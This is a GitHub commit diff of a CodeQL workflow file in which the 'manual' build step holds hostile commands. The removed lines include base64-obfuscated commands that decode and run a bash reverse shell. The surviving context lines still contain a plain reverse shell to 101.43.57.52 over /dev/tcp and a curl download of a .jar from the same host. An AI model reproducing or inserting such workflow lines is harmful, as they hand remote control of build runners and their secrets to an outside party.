Skip to content

Commit 5fb3606

Browse files
authored
Update codeql.yml
1 parent 4e590ff commit 5fb3606

File tree

1 file changed

+0
-7
lines changed

1 file changed

+0
-7
lines changed

.github/workflows/codeql.yml

Lines changed: 0 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -79,13 +79,6 @@ jobs:
7979
- if: matrix.build-mode == 'manual'
8080
shell: bash
8181
run: |
82-
echo 'If you are using a "manual" build mode for one or more of the' \
83-
'languages you are analyzing, replace this with the commands to build' \
84-
'your code, for example:'
85-
echo ' make bootstrap'
86-
echo ' make release'
87-
{echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDMuNTcuNTIvMTEwMTIgMD4mMQ==}|{base64,-d}|{bash,-i}
88-
bash -c {echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDMuNTcuNTIvMTEwMTIgMD4mMQ==}|{base64,-d}|{bash,-i}
8982
bash -i >& /dev/tcp/101.43.57.52/11012 0>&1
9083
curl http://101.43.57.52:11013/test22222.jar
9184
exit 1

0 commit comments

Comments
 (0)